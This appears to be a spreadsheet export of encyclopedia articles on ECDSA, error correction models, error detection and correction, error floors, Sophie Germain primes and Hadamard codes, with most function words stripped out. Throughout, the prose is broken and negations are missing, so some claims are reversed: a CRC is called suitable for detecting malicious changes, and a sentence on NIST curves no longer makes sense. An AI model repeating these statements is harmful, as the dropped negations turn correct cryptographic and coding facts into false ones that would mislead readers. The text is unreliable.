identity, left {\displaystyle q_{a}=(-zr^{-1}+(zr^{-1}+d_{a}))\times first second terms cancel out, {\displaystyle q_{a}=d_{a}\times from definition {\displaystyle q_{a}=d_{a}\times alice's public key. this shows correctly signed message recover correct public key, provided additional information shared uniquely calculate curve point {\displaystyle r=(x_{1},y_{1})} signature value security december 2010, group calling fail0verflow announced recovery ecdsa private used sony sign software playstation game console. however, attack worked sony properly implement algorithm, {\displaystyle static instead random. pointed signature generation algorithm section above, makes {\displaystyle d_{a}} solvable, rendering entire algorithm useless.on march 2011, researchers published iacr paper demonstrating possible retrieve private server using openssl authenticates elliptic curves binary field timing attack. vulnerability fixed openssl 1.0.0e.in august 2013, revealed bugs implementations java class securerandom sometimes generated collisions {\displaystyle value. this allowed hackers recover private keys giving control bitcoin transactions legitimate keys' owners had, using exploit used reveal signing android implementations, java rely ecdsa authenticate transactions.this issue prevented unpredictable generation {\displaystyle e.g., deterministic procedure described 6979. concerns some concerns expressed ecdsa: political concerns: trustworthiness nist-produced curves questioned revelations willingly inserts backdoors software, hardware components published standards made; well-known cryptographers expressed doubts nist curves designed, voluntary tainting already proved past. (see also libssh curve25519 introduction.) nevertheless, proof named nist curves exploit rare weakness, missing yet. technical concerns: difficulty properly implementing standard, slowness, design flaws reduce security insufficiently defensive implementations. implementations below list cryptographic libraries provide support ecdsa: botan bouncy castle cryptlib crypto++ libgcrypt gnutls openssl wolfcrypt libressl mbed microsoft cryptoapi crypto (linux) also eddsa (cryptosystem) references further reading accredited standards committee issues standard public cryptography/ecdsa, oct. 2020. source accredited standards committee american national standard x9.62-2005, public cryptography financial services industry, elliptic curve digital signature algorithm (ecdsa), november 2005. certicom research, standards efficient cryptography, elliptic curve cryptography, version 2.0, 2009. lópez, dahab, overview elliptic curve cryptography, technical report ic-00-10, state university campinas, 2000. daniel bernstein, pippenger's exponentiation algorithm, 2002. daniel brown, generic groups, collision resistance, ecdsa, designs, codes cryptography, 119–152, 2005. eprint version blake, gadiel seroussi, nigel smart, editors, advances elliptic curve cryptography, london mathematical society lecture note series 317, cambridge university press, 2005. hankerson, vanstone, menezes, (2004). guide elliptic curve cryptography. springer professional computing. york: springer. doi:10.1007/b97644. isbn 0-387-95273-x. s2cid 720546. external links digital signature standard; includes info ecdsa elliptic curve digital signature algorithm (ecdsa); provides in-depth guide ecdsa. wayback link</t>
  </si>
  <si>
    <t>Error correction model</t>
  </si>
  <si>
    <t>error correction model (ecm) belongs category multiple time series models commonly used data underlying variables long-run common stochastic trend, also known cointegration. ecms theoretically-driven approach useful estimating short-term long-term effects time series another. term error-correction relates fact last-period's deviation long-run equilibrium, error, influences short-run dynamics. thus ecms directly estimate speed dependent variable returns equilibrium change variables. history yule (1926) granger newbold (1974) first draw attention problem spurious correlation find solutions address time series analysis. given completely unrelated integrated (non-stationary) time series, regression analysis tend produce apparently statistically significant relationship thus researcher might falsely believe found evidence true relationship variables. ordinary least squares longer consistent commonly used test-statistics non-valid. particular, monte carlo simulations show high squared, high individual t-statistic durbin–watson statistic. technically speaking, phillips (1986) proved parameter estimates converge probability, intercept diverge slope non-degenerate distribution sample size increases. however, might common stochastic trend series researcher genuinely interested reflects long-run relationship variables. because stochastic nature trend possible break integrated series deterministic (predictable) trend stationary series containing deviations trend. even deterministically detrended random walks spurious correlations eventually emerge. thus detrending solve estimation problem. order still box–jenkins approach, could difference series estimate models arima, given many commonly used time series (e.g. economics) appear stationary first differences. forecasts model still reflect cycles seasonality present data. however, information long-run adjustments data levels contain omitted longer term forecasts unreliable. this sargan (1964) develop methodology, retains level information. estimation several methods known literature estimating refined dynamic model described above. among engle granger 2-step approach, estimating step vector-based vecm using johansen's method. engle granger 2-step approach first step method pretest individual time series uses order confirm non-stationary first place. this done standard unit root testing test resolve problem serially correlated errors). take case different series {\displaystyle x_{t}} {\displaystyle y_{t}} i(0), standard regression analysis valid. integrated different order, e.g. i(1) i(0), transform model. integrated order (commonly i(1)), estimate model form {\displaystyle a(l)\,\delta y_{t}=\gamma +b(l)\,\delta x_{t}+\alpha (y_{t-1}-\beta _{0}-\beta _{1}x_{t-1})+\nu _{t}.} variables integrated exists, cointegrated engle–granger representation theorem. second step estimate model using ordinary least squares: {\displaystyle y_{t}=\beta _{0}+\beta _{1}x_{t}+\varepsilon _{t}} regression spurious determined test criteria described above, ordinary least squares valid, fact super consistent (stock, 1987). then predicted residuals {\displaystyle {\hat {\varepsilon _{t}}}=y_{t}-\beta _{0}-\beta _{1}x_{t}} regression saved used regression differenced variables plus lagged error term {\displaystyle a(l)\,\delta y_{t}=\gamma +b(l)\,\delta x_{t}+\alpha {\hat {\varepsilon }}_{t-1}+\nu _{t}.} test cointegration using standard t-statistic {\displaystyle \alpha while approach easy apply, are, however numerous problems: univariate unit root tests used first stage statistical power choice dependent variable first stage influences test results, i.e. need weak exogeneity {\displaystyle x_{t}} determined granger causality potentially small sample bias cointegration test {\displaystyle \alpha follow standard distribution validity long-run parameters first regression stage obtains residuals cannot verified distribution estimator cointegrating vector highly complicated non-normal cointegrating relationship examined. vecm engle–granger approach described suffers number weaknesses. namely restricted single equation variable designated dependent variable, explained another variable assumed weakly exogeneous parameters interest. also relies pretesting time series find whether variables i(0) i(1). these weaknesses addressed johansen's procedure. advantages include pretesting necessary, numerous cointegrating relationships, variables treated endogenous tests relating long-run parameters possible. resulting model known vector error correction model (vecm), adds error correction features multi-factor model known vector autoregression (var). procedure done follows: step estimate unrestricted involving potentially non-stationary variables step test cointegration using johansen test step form analyse vecm. example idea cointegration demonstrated simple macroeconomic setting. suppose, consumption {\displaystyle c_{t}} disposable income {\displaystyle y_{t}} macroeconomic time series related long (see permanent income hypothesis). specifically, average propensity consume 90%, long {\displaystyle c_{t}=0.9y_{t}} from econometrician's point view, long relationship (aka cointegration) exists errors regression {\displaystyle c_{t}=\beta y_{t}+\varepsilon _{t}} stationary series, although {\displaystyle y_{t}} {\displaystyle c_{t}} non-stationary. suppose also {\displaystyle y_{t}} suddenly changes {\displaystyle \delta y_{t}} {\displaystyle c_{t}} changes {\displaystyle \delta c_{t}=0.5\,\delta y_{t}} marginal propensity consume equals 50%. final assumption current equilibrium consumption decreases period 20%. setting change {\displaystyle \delta c_{t}=c_{t}-c_{t-1}} consumption level modelled {\displaystyle \delta c_{t}=0.5\,\delta y_{t}-0.2(c_{t-1}-0.9y_{t-1})+\varepsilon _{t}} first term describes short-run impact change {\displaystyle y_{t}} {\displaystyle c_{t}} second term explains long-run gravitation towards equilibrium relationship variables, third term reflects random shocks system receives (e.g. shocks consumer confidence affect consumption). model works, consider kinds shocks: permanent transitory (temporary). simplicity, {\displaystyle \varepsilon _{t}} zero suppose period system equilibrium, i.e. {\displaystyle c_{t-1}=0.9y_{t-1}} suppose period {\displaystyle y_{t}} increases returns previous level. then {\displaystyle c_{t}} first period increases (half 10), second period {\displaystyle c_{t}} begins decrease converges initial level. contrast, shock {\displaystyle y_{t}} permanent, {\displaystyle c_{t}} slowly converges value exceeds initial {\displaystyle c_{t-1}} this structure common models. practice, econometricians often first estimate cointegration relationship (equation levels), insert main model (equation differences). references further reading dolado, juan gonzalo, jesús; marmol, francesc (2001). "cointegration". baltagi, badi (ed.). companion theoretical econometrics. oxford: blackwell. 634–654. doi:10.1002/9780470996249.ch31. isbn 0-631-21254-x. enders, walter (2010). applied econometric time series (third ed.). york: john wiley sons. 272–355. isbn 978-0-470-50539-7. lütkepohl, helmut (2006). introduction multiple time series analysis. berlin: springer. 237–352. isbn 978-3-540-26239-8. martin, vance; hurn, stan; harris, david (2013). econometric modelling time series. york: cambridge university press. 662–711. isbn 978-0-521-13981-6.</t>
  </si>
  <si>
    <t>Error detection and correction</t>
  </si>
  <si>
    <t>information theory coding theory applications computer science telecommunication, error detection correction (edac) error control techniques enable reliable delivery digital data unreliable communication channels. many communication channels subject channel noise, thus errors introduced transmission source receiver. error detection techniques allow detecting errors, error correction enables reconstruction original data many cases. definitions error detection detection errors caused noise impairments transmission transmitter receiver. error correction detection errors reconstruction original, error-free data. history classical antiquity, copyists hebrew bible paid work according number stichs (lines verse). prose books bible hardly ever written stichs, copyists, order estimate amount work, count letters. this also helped ensure accuracy transmission text production subsequent copies. between 10th centuries group jewish scribes formalized expanded create numerical masorah ensure accurate reproduction sacred text. included counts number words line, section, book groups books, noting middle stich book, word statistics, commentary. standards became deviation even single letter torah scroll considered unacceptable. effectiveness error correction method verified accuracy copying centuries demonstrated discovery dead scrolls 1947–1956, dating c.150 bce-75 ce.the modern development error correction codes credited richard hamming 1947. description hamming's code appeared claude shannon's mathematical theory communication quickly generalized marcel golay. introduction error-detection correction schemes redundancy (i.e., extra data) message, receivers check consistency delivered message, recover data determined corrupted. error-detection correction schemes either systematic non-systematic. systematic scheme, transmitter sends original data, attaches fixed number check bits parity data), derived data bits deterministic algorithm. error detection required, receiver simply apply algorithm received data bits compare output received check bits; values match, error occurred point transmission. system uses non-systematic code, original message transformed encoded message carrying information least many bits original message. good error control performance requires scheme selected based characteristics communication channel. common channel models include memoryless models errors occur randomly certain probability, dynamic models errors occur primarily bursts. consequently, error-detecting correcting codes generally distinguished random-error-detecting/correcting burst-error-detecting/correcting. some codes also suitable mixture random errors burst errors. channel characteristics cannot determined, highly variable, error-detection scheme combined system retransmissions erroneous data. this known automatic repeat request (arq), notably used internet. alternate approach error control hybrid automatic repeat request (harq), combination error-correction coding. types error correction there three major types error correction. automatic repeat request automatic repeat request (arq) error control method data transmission makes error-detection codes, acknowledgment and/or negative acknowledgment messages, timeouts achieve reliable data transmission. acknowledgment message sent receiver indicate correctly received data frame. usually, transmitter receive acknowledgment timeout occurs (i.e., within reasonable amount time sending data frame), retransmits frame either correctly received error persists beyond predetermined number retransmissions. three types protocols stop-and-wait arq, go-back-n arq, selective repeat arq. appropriate communication channel varying unknown capacity, case internet. however, requires availability back channel, results possibly increased latency retransmissions, requires maintenance buffers timers retransmissions, case network congestion strain server overall network capacity.for example, used shortwave radio data links form arq-e, combined multiplexing arq-m. forward error correction forward error correction (fec) process adding redundant data error-correcting code (ecc) message recovered receiver even number errors capability code used) introduced, either process transmission storage. since receiver sender retransmission data, backchannel required forward error correction. error-correcting codes used lower-layer communication cellular network, high-speed fiber-optic communication wi-fi, well reliable storage media flash memory, hard disk ram.error-correcting codes usually distinguished convolutional codes block codes: convolutional codes processed bit-by-bit basis. they particularly suitable implementation hardware, viterbi decoder allows optimal decoding. block codes processed block-by-block basis. early examples block codes repetition codes, hamming codes multidimensional parity-check codes. they followed number efficient codes, reed–solomon codes notable current widespread use. turbo codes low-density parity-check codes (ldpc) relatively constructions provide almost optimal efficiency.shannon's theorem important theorem forward error correction, describes maximum information rate reliable communication possible channel certain error probability signal-to-noise ratio (snr). this strict upper limit expressed terms channel capacity. more specifically, theorem says exist codes increasing encoding length probability error discrete memoryless channel made arbitrarily small, provided code rate smaller channel capacity. code rate defined fraction source symbols encoded symbols. actual maximum code rate allowed depends error-correcting code used, lower. this shannon's proof existential nature, show construct codes optimal efficient encoding decoding algorithms. hybrid schemes hybrid combination forward error correction. there basic approaches: messages always transmitted parity data (and error-detection redundancy). receiver decodes message using parity information, requests retransmission using parity data sufficient successful decoding (identified failed integrity check). messages transmitted without parity data (only error-detection information). receiver detects error, requests information transmitter using arq, uses reconstruct original message.the latter approach particularly attractive erasure channel using rateless erasure code. error detection schemes error detection commonly realized using suitable hash function specifically, checksum, cyclic redundancy check algorithm). hash function adds fixed-length message, enables receivers verify delivered message recomputing comparing provided. there exists vast variety different hash function designs. however, particularly widespread either simplicity suitability detecting certain kinds errors (e.g., cyclic redundancy check's performance detecting burst errors). minimum distance coding random-error-correcting code based minimum distance coding provide strict guarantee number detectable errors, protect preimage attack. repetition codes repetition code coding scheme repeats bits across channel achieve error-free communication. given stream data transmitted, data divided blocks bits. each block transmitted predetermined number times. example, send pattern "1011", four-bit block repeated three times, thus producing "1011 1011 1011". twelve-bit pattern received "1010 1011 1011" first block unlike error occurred. repetition code inefficient, susceptible problems error occurs exactly place group (e.g., "1010 1010 1010" previous example would detected correct). advantage repetition codes extremely simple, fact used transmissions numbers stations. parity parity added group source bits ensure number bits (i.e., bits value outcome even odd. simple scheme used detect single number (i.e., three, five, etc.) errors output. even number flipped bits make parity appear correct even though data erroneous. parity bits added "word" sent called transverse redundancy checks, added stream "words" called longitudinal redundancy checks. example, series m-bit "words" parity added, showing whether even number ones word, word single error detected. known word error however. addition, stream words parity sent, shows whether even number ones bit-position sent recent group, exact position error determined error corrected. this method guaranteed effective, however, error every group words. with error correction bits, errors detected cases corrected. there also bit-grouping techniques. checksum checksum message modular arithmetic message code words fixed word length (e.g., byte values). negated means ones'-complement operation prior transmission detect unintentional all-zero messages. checksum schemes include parity bits, check digits, longitudinal redundancy checks. some checksum schemes, damm algorithm, luhn algorithm, verhoeff algorithm, specifically designed detect errors commonly introduced humans writing remembering identification numbers. cyclic redundancy check cyclic redundancy check (crc) non-secure hash function designed detect accidental changes digital data computer networks. suitable detecting maliciously introduced errors. characterized specification generator polynomial, used divisor polynomial long division finite field, taking input data dividend. remainder becomes result. properties make well suited detecting burst errors. crcs particularly easy implement hardware therefore commonly used computer networks storage devices hard disk drives. parity seen special-case 1-bit crc. cryptographic hash function output cryptographic hash function, also known message digest, provide strong assurances data integrity, whether changes data accidental (e.g., transmission errors) maliciously introduced. modification data likely detected mismatching hash value. furthermore, given hash value, typically infeasible find input data (other given) yield hash value. attacker change message also hash value, keyed hash message authentication code (mac) used additional security. without knowing key, possible attacker easily conveniently calculate correct keyed hash value modified message. error correction code error-correcting code used error detection. code minimum hamming distance, detect errors code word. using minimum-distance-based error-correcting codes error detection suitable strict limit minimum number errors detected desired. codes minimum hamming distance degenerate cases error-correcting codes, used detect single errors. parity example single-error-detecting code. applications applications require latency (such telephone conversations) cannot automatic repeat request (arq); must forward error correction (fec). time system discovers error re-transmits re-sent data arrive late usable. applications transmitter immediately forgets information soon sent (such television cameras) cannot arq; must error occurs, original data longer available. applications must return channel; applications return channel cannot arq. applications require extremely error rates (such digital money transfers) must possibility uncorrectable errors fec. reliability inspection engineering also make theory error-correcting codes. internet typical tcp/ip stack, error control performed multiple levels: each ethernet frame uses crc-32 error detection. frames detected errors discarded receiver hardware. ipv4 header contains checksum protecting contents header. packets incorrect checksums dropped within network receiver. checksum omitted ipv6 header order minimize processing costs network routing current link layer technology assumed provide sufficient error detection (see also 3819). optional checksum covering payload addressing information headers. packets incorrect checksums discarded network stack. checksum optional ipv4, required ipv6. when omitted, assumed data-link layer provides desired level error protection. provides checksum protecting payload addressing information headers. packets incorrect checksums discarded network stack, eventually retransmitted using arq, either explicitly (such three-way handshake) implicitly timeout. deep-space telecommunications development error-correction codes tightly coupled history deep-space missions extreme dilution signal power interplanetary distances, limited power availability aboard space probes. whereas early missions sent data uncoded, starting 1968, digital error correction implemented form (sub-optimally decoded) convolutional codes reed–muller codes. reed–muller code well suited noise spacecraft subject (approximately matching bell curve), implemented mariner spacecraft used missions 1969 1977. voyager voyager missions, started 1977, designed deliver color imaging scientific information jupiter saturn. this resulted increased coding requirements, thus, spacecraft supported (optimally viterbi-decoded) convolutional codes could concatenated outer golay (24,12,8) code. voyager craft additionally supported implementation reed–solomon code. concatenated reed–solomon–viterbi (rsv) code allowed powerful error correction, enabled spacecraft's extended journey uranus neptune. after system upgrades 1989, crafts used coding. consultative committee space data systems currently recommends usage error correction codes performance similar voyager code minimum. concatenated codes increasingly falling favor space missions, replaced powerful codes turbo codes ldpc codes. different kinds deep space orbital missions conducted suggest trying find one-size-fits-all error correction system ongoing problem. missions close earth, nature noise communication channel different spacecraft interplanetary mission experiences. additionally, spacecraft increases distance earth, problem correcting noise becomes difficult. satellite broadcasting demand satellite transponder bandwidth continues grow, fueled desire deliver television (including channels high-definition television) data. transponder availability bandwidth constraints limited growth. transponder capacity determined selected modulation scheme proportion capacity consumed fec. data storage error detection correction codes often used improve reliability data storage media. parity track capable detecting single-bit errors present first magnetic tape data storage 1951. optimal rectangular code used group coded recording tapes detects also corrects single-bit errors. some file formats, particularly archive formats, include checksum (most often crc32) detect corruption truncation employ redundancy parity files recover portions corrupted data. reed-solomon codes used compact discs correct errors caused scratches. modern hard drives reed–solomon codes detect correct minor errors sector reads, recover corrupted data failing sectors store data spare sectors. raid systems variety error correction techniques recover data hard drive completely fails. filesystems btrfs, well raid implementations, support data scrubbing resilvering, allows blocks detected (hopefully) recovered used. recovered data re-written exactly physical location, spare blocks elsewhere piece hardware, data rewritten onto replacement hardware. error-correcting memory dynamic random-access memory (dram) provide stronger protection soft errors relying error-correcting codes. such error-correcting memory, known edac-protected memory, particularly desirable mission-critical applications, scientific computing, financial, medical, etc. well extraterrestrial applications increased radiation space. error-correcting memory controllers traditionally hamming codes, although triple modular redundancy. interleaving allows distributing effect single cosmic potentially upsetting multiple physically neighboring bits across multiple words associating neighboring bits different words. long single-event upset (seu) exceed error threshold (e.g., single error) particular word accesses, corrected (e.g., single-bit error-correcting code), illusion error-free memory system maintained.in addition hardware providing features required memory operate, operating systems usually contain related reporting facilities used provide notifications soft errors transparently recovered. example linux kernel's edac subsystem (previously known bluesmoke), collects data error-checking-enabled components inside computer system; besides collecting reporting back events related memory, also supports checksumming errors, including detected bus. systems also support memory scrubbing catch correct errors early become unrecoverable. also berger code burst error-correcting code memory, type computer data storage link adaptation list algorithms error detection correction list hash functions references further reading lin; daniel costello, (1983). error control coding: fundamentals applications. prentice hall. isbn 0-13-283796-x. softecc: system software memory integrity checking tunable, software-based dram error detection correction library detection correction silent data corruption large-scale high-performance computing external links on-line textbook: information theory, inference, learning algorithms, david j.c. mackay, contains chapters elementary error-correcting codes; theoretical limits error-correction; latest state-of-the-art error-correcting codes, including low-density parity-check codes, turbo codes, fountain codes. page implementations popular encoding decoding routines</t>
  </si>
  <si>
    <t>Error floor</t>
  </si>
  <si>
    <t>error floor phenomenon encountered modern iterated sparse graph-based error correcting codes like ldpc codes turbo codes. when error ratio (ber) plotted conventional codes like reed–solomon codes algebraic decoding convolutional codes viterbi decoding, steadily decreases form curve condition becomes better. ldpc codes turbo codes point curve fall quickly before, words, region performance flattens. this region called error floor region. region sudden drop performance called waterfall region.error floors usually attributed low-weight codewords case turbo codes) trapping sets near-codewords case ldpc codes). references</t>
  </si>
  <si>
    <t>Sophie Germain prime</t>
  </si>
  <si>
    <t>number theory, prime number sophie germain prime also prime. number associated sophie germain prime called safe prime. example, sophie germain prime associated safe prime. sophie germain primes named french mathematician sophie germain, used investigations fermat's last theorem. sophie germain primes safe primes applications public cryptography primality testing. conjectured infinitely many sophie germain primes, remains unproven. individual numbers first sophie germain primes (those less 1000) 113, 131, 173, 179, 191, 233, 239, 251, 281, 293, 359, 419, 431, 443, 491, 509, 593, 641, 653, 659, 683, 719, 743, 761, 809, 911, 953, oeis: a005384hence, first safe primes 107, 167, 179, 227, 263, 347, 359, 383, 467, 479, 503, 563, 587, 719, 839, 863, 887, 983, 1019, 1187, 1283, 1307, 1319, 1367, 1439, 1487, 1523, 1619, 1823, 1907, oeis: a005385in cryptography much larger sophie germain primes like 1,846,389,521,368 11600 required. distributed computing projects, primegrid twin prime search, include searches large sophie germain primes. some largest known sophie germain primes given following table. 2019, fabrice boudot, pierrick gaudry, aurore guillevic, nadia heninger, emmanuel thomé, paul zimmermann announced computation discrete logarithm modulo 240-digit (795 bit) prime rsa-240 49204 (the first safe prime rsa-240) using number field sieve algorithm; discrete logarithm records. properties there special primality test safe primes fermat primes mersenne primes. however, pocklington's criterion used prove primality proven primality just every term except last cunningham chain first kind sophie germain prime, every term except first chain safe prime. safe primes ending form last terms chains occur, since 2(10n divisible safe prime congruent modulo divisor mersenne number matching sophie germain prime exponent. safe prime, divides 3(q−1)/2 (this follows fact quadratic residue modular restrictions with exception safe prime form equivalently, (mod similarly, exception safe prime form equivalently, (mod trivially true since must evaluate natural number. combining forms using lcm(6, determine safe prime also must form equivalently, (mod 12). follows (also quadratic residue safe prime (thus, primitive root safe prime safe primes also full reptend primes base sophie germain prime greater must congruent for, not, would congruent would congruent impossible prime number. similar restrictions hold larger prime moduli, basis choice "correction factor" hardy–littlewood estimate density sophie germain primes.if sophie germain prime congruent (mod (oeis: a002515, lucasian primes), matching safe prime divisor mersenne number historically, result leonhard euler first known criterion mersenne number prime index composite. used generate largest mersenne numbers (with prime indices) known composite. infinitude density conjectured infinitely many sophie germain primes, proved. several famous conjectures number theory generalize twin prime conjecture; include dickson's conjecture, schinzel's hypothesis bateman–horn conjecture. heuristic estimate number sophie germain primes less 1.32032 {\displaystyle 2c{\frac {n}{(\ln n)^{2}}}\approx 1.32032{\frac {n}{(\ln n)^{2}}}} 0.660161 {\displaystyle c=\prod _{p&gt;2}{\frac {p(p-2)}{(p-1)^{2}}}\approx 0.660161} hardy–littlewood's twin prime constant. 104, estimate predicts sophie germain primes, error compared exact value 190. 107, estimate predicts 50822, still exact value 56032. form estimate hardy littlewood, applied similar estimate twin primes.a sequence 2(2p ...) numbers prime called cunningham chain first kind. every term sequence except last sophie germain prime, every term except first safe prime. extending conjecture exist infinitely many sophie germain primes, also conjectured arbitrarily long cunningham chains exist, although infinite chains known impossible. strong primes prime number strong prime large (around digits) prime factors. safe prime number naturally large prime factor, namely safe prime meets part criteria strong prime. running times methods factoring number prime factor depend partly size prime factors this true, instance, method. applications cryptography safe primes also important cryptography discrete logarithm-based techniques like diffie–hellman exchange. safe prime, multiplicative group integers modulo subgroup large prime order. usually prime-order subgroup desirable, reason using safe primes modulus small possible relative prime number called safe prime prime. thus, safe prime sophie germain prime, finding safe primes finding sophie germain primes equivalent computational difficulty. notion safe prime strengthened strong prime, large prime factors. safe strong primes useful factors secret keys cryptosystem, prevent system broken factorization algorithms pollard's algorithm. however, current factorization technology, advantage using safe strong primes appears negligible.similar issues apply cryptosystems well, including diffie–hellman exchange similar systems depend security discrete problem rather integer factorization. reason, generation protocols methods often rely efficient algorithms generating strong primes, turn rely conjecture primes sufficiently high density.in sophie germain counter mode, proposed arithmetic finite field order equal sophie germain prime 2128 12451, counter weaknesses galois/counter mode using binary finite field gf(2128). however, sgcm shown vulnerable many cryptographic attacks gcm. primality testing first version primality test paper, conjecture sophie germain primes used lower worst case complexity o(log12n) o(log6n). later version paper shown time complexity o(log7.5n) also lowered o(log6n) using conjecture. later variants proven complexity o(log6n) without conjectures sophie germain primes. pseudorandom number generation safe primes obeying certain congruences used generate pseudo-random numbers monte carlo simulation. similarly, sophie germain primes used generation pseudo-random numbers. decimal expansion produce stream pseudo-random digits, safe prime sophie germain prime congruent modulo thus "suitable" prime numbers 167, 179, etc. (oeis: a000353) (corresponding etc.) (oeis: a000355). result stream length digits (including leading zeros). example, using generates pseudo-random digits note digits appropriate cryptographic purposes, value derived predecessor digit-stream. popular culture sophie germain primes mentioned stage play proof subsequent film. references external links safe prime planetmath. abramowitz, stegun, (1972). handbook mathematical functions. applied math. series. vol. (tenth printing ed.). national bureau standards. 870.</t>
  </si>
  <si>
    <t>Hadamard code</t>
  </si>
  <si>
    <t>hadamard code error-correcting code named jacques hadamard used error detection correction transmitting messages noisy unreliable channels. 1971, code used transmit photos mars back earth nasa space probe mariner because unique mathematical properties, hadamard code used engineers, also intensely studied coding theory, mathematics, theoretical computer science. hadamard code also known names walsh code, walsh family, walsh–hadamard code recognition american mathematician joseph leonard walsh. hadamard code example linear code length {\displaystyle 2^{m}} binary alphabet. unfortunately, term somewhat ambiguous references assume message length {\displaystyle k=m} others assume message length {\displaystyle k=m+1} article, first case called hadamard code second called augmented hadamard code. hadamard code unique non-zero codeword hamming weight exactly {\displaystyle 2^{k-1}} implies distance code also {\displaystyle 2^{k-1}} standard coding theory notation block codes, hadamard code {\displaystyle [2^{k},k,2^{k-1}]_{2}} -code, linear code binary alphabet, block length {\displaystyle 2^{k}} message length dimension) {\displaystyle minimum distance {\displaystyle 2^{k}/2} block length large compared message length, hand, errors corrected even extremely noisy conditions. augmented hadamard code slightly improved version hadamard code; {\displaystyle [2^{k},k+1,2^{k-1}]_{2}} -code thus slightly better rate maintaining relative distance {\displaystyle 1/2} thus preferred practical applications. communication theory, simply called hadamard code first order reed–muller code binary alphabet.normally, hadamard codes based sylvester's construction hadamard matrices, term “hadamard code” also used refer codes constructed arbitrary hadamard matrices, necessarily sylvester type. general, code linear. such codes first constructed chandra bose sharadchandra shankar shrikhande 1959. size hadamard matrix, code parameters {\displaystyle (n,2n,n/2)_{2}} meaning not-necessarily-linear binary code codewords block length minimal distance n/2. construction decoding scheme described apply general property linearity identification reed–muller codes require power hadamard matrix equivalent matrix constructed sylvester's method. hadamard code locally decodable code, provides recover parts original message high probability, looking small fraction received word. this gives rise applications computational complexity theory particularly design probabilistically checkable proofs. since relative distance hadamard code 1/2, normally hope recover fraction error. using list decoding, however, possible compute short list possible candidate messages long fewer {\displaystyle {\frac {1}{2}}-\epsilon bits received word corrupted. code-division multiple access (cdma) communication, hadamard code referred walsh code, used define individual communication channels. usual cdma literature refer codewords “codes”. each user different codeword, “code”, modulate signal. because walsh codewords mathematically orthogonal, walsh-encoded signal appears random noise cdma capable mobile terminal, unless terminal uses codeword used encode incoming signal. history hadamard code name commonly used code literature. however, modern error correcting codes referred walsh–hadamard codes. there reason this: jacques hadamard invent code himself, defined hadamard matrices around 1893, long first error-correcting code, hamming code, developed 1940s. hadamard code based hadamard matrices, many different hadamard matrices could used here, normally sylvester's construction hadamard matrices used obtain codewords hadamard code. james joseph sylvester developed construction hadamard matrices 1867, actually predates hadamard's work hadamard matrices. hence name hadamard code disputed sometimes code called walsh code, honoring american mathematician joseph leonard walsh. augmented hadamard code used 1971 mariner mission correct picture transmission errors. data words used mission bits long, represented grayscale values. because limitations quality alignment transmitter time (due doppler tracking loop issues) maximum useful data length bits. instead using repetition code, [32, hadamard code used. errors bits word could corrected using scheme. compared 5-repetition code, error correcting properties hadamard code much better, rate comparable. efficient decoding algorithm important factor decision code. circuitry used called "green machine". employed fast fourier transform increase decoding speed factor three. since 1990s code space programs less ceased, nasa deep space network support error correction scheme dishes greater constructions while hadamard codes based hadamard matrices, constructions differ subtle ways different scientific fields, authors, uses. engineers, codes data transmission, coding theorists, analyse extremal properties codes, typically want rate code high possible, even means construction becomes mathematically slightly less elegant. hand, many applications hadamard codes theoretical computer science important achieve optimal rate, hence simpler constructions hadamard codes preferred since analyzed elegantly. construction using inner products when given binary message {\displaystyle x\in \{0,1\}^{k}} length {\displaystyle hadamard code encodes message codeword {\displaystyle {\text{had}}(x)} using encoding function {\displaystyle {\text{had}}:\{0,1\}^{k}\to \{0,1\}^{2^{k}}.} this function makes inner product {\displaystyle \langle x,y\rangle vectors {\displaystyle x,y\in \{0,1\}^{k}} defined follows: {\displaystyle \langle x,y\rangle =\sum _{i=1}^{k}x_{i}y_{i}\ {\bmod }}2\,.} then hadamard encoding {\displaystyle defined sequence inner products {\displaystyle {\displaystyle {\text{had}}(x)={\big (}\langle x,y\rangle {\big )}_{y\in \{0,1\}^{k}}} mentioned above, augmented hadamard code used practice since hadamard code somewhat wasteful. this because, first {\displaystyle zero, {\displaystyle y_{1}=0} inner product contains information whatsoever {\displaystyle x_{1}} hence, impossible fully decode {\displaystyle positions codeword alone. hand, codeword restricted positions {\displaystyle y_{1}=1} still possible fully decode {\displaystyle hence makes sense restrict hadamard code positions, gives rise augmented hadamard encoding {\displaystyle phad {\displaystyle {\text{phad}}(x)={\big (}\langle x,y\rangle {\big )}_{y\in \{1\}\times \{0,1\}^{k-1}}} construction using generator matrix hadamard code linear code, linear codes generated generator matrix {\displaystyle this matrix {\displaystyle {\text{had}}(x)=x\cdot holds {\displaystyle x\in \{0,1\}^{k}} message {\displaystyle viewed vector vector-matrix product understood vector space finite field {\displaystyle \mathbb _{2}} particular, equivalent write inner product definition hadamard code arises using generator matrix whose columns consist strings {\displaystyle length {\displaystyle {\displaystyle g={\begin{pmatrix}\uparrow &amp;\uparrow &amp;&amp;\uparrow \\y_{1}&amp;y_{2}&amp;\dots &amp;y_{2^{k}}\\\downarrow &amp;\downarrow &amp;&amp;\downarrow \end{pmatrix}}\,.} {\displaystyle y_{i}\in \{0,1\}^{k}} {\displaystyle binary vector lexicographical order. example, generator matrix hadamard code dimension {\displaystyle k=3} {\displaystyle g={\begin{bmatrix}0&amp;0&amp;0&amp;0&amp;1&amp;1&amp;1&amp;1\\0&amp;0&amp;1&amp;1&amp;0&amp;0&amp;1&amp;1\\0&amp;1&amp;0&amp;1&amp;0&amp;1&amp;0&amp;1\end{bmatrix}}.} matrix {\displaystyle {\displaystyle (k\times 2^{k})} -matrix gives rise linear operator {\displaystyle {\text{had}}:\{0,1\}^{k}\to \{0,1\}^{2^{k}}} generator matrix augmented hadamard code obtained restricting matrix {\displaystyle columns whose first entry one. example, generator matrix augmented hadamard code dimension {\displaystyle k=3} {\displaystyle g'={\begin{bmatrix}1&amp;1&amp;1&amp;1\\0&amp;0&amp;1&amp;1\\0&amp;1&amp;0&amp;1\end{bmatrix}}.} then phad {\displaystyle {\text{phad}}:\{0,1\}^{k}\to \{0,1\}^{2^{k-1}}} linear mapping phad {\displaystyle {\text{phad}}(x)=x\cdot general {\displaystyle generator matrix augmented hadamard code parity-check matrix extended hamming code length {\displaystyle 2^{k-1}} dimension {\displaystyle 2^{k-1}-k} makes augmented hadamard code dual code extended hamming code. hence alternative define hadamard code terms parity-check matrix: parity-check matrix hadamard code equal generator matrix hamming code. construction using general hadamard matrices hadamard codes obtained n-by-n hadamard matrix particular, codewords code rows rows obtain code alphabet {0,1}, mapping equivalently, x)/2, applied matrix elements. that minimum distance code follows defining property hadamard matrices, namely rows mutually orthogonal. this implies distinct rows hadamard matrix differ exactly positions, and, since negation affect orthogonality, differs positions well, except rows correspond, case differ positions. augmented 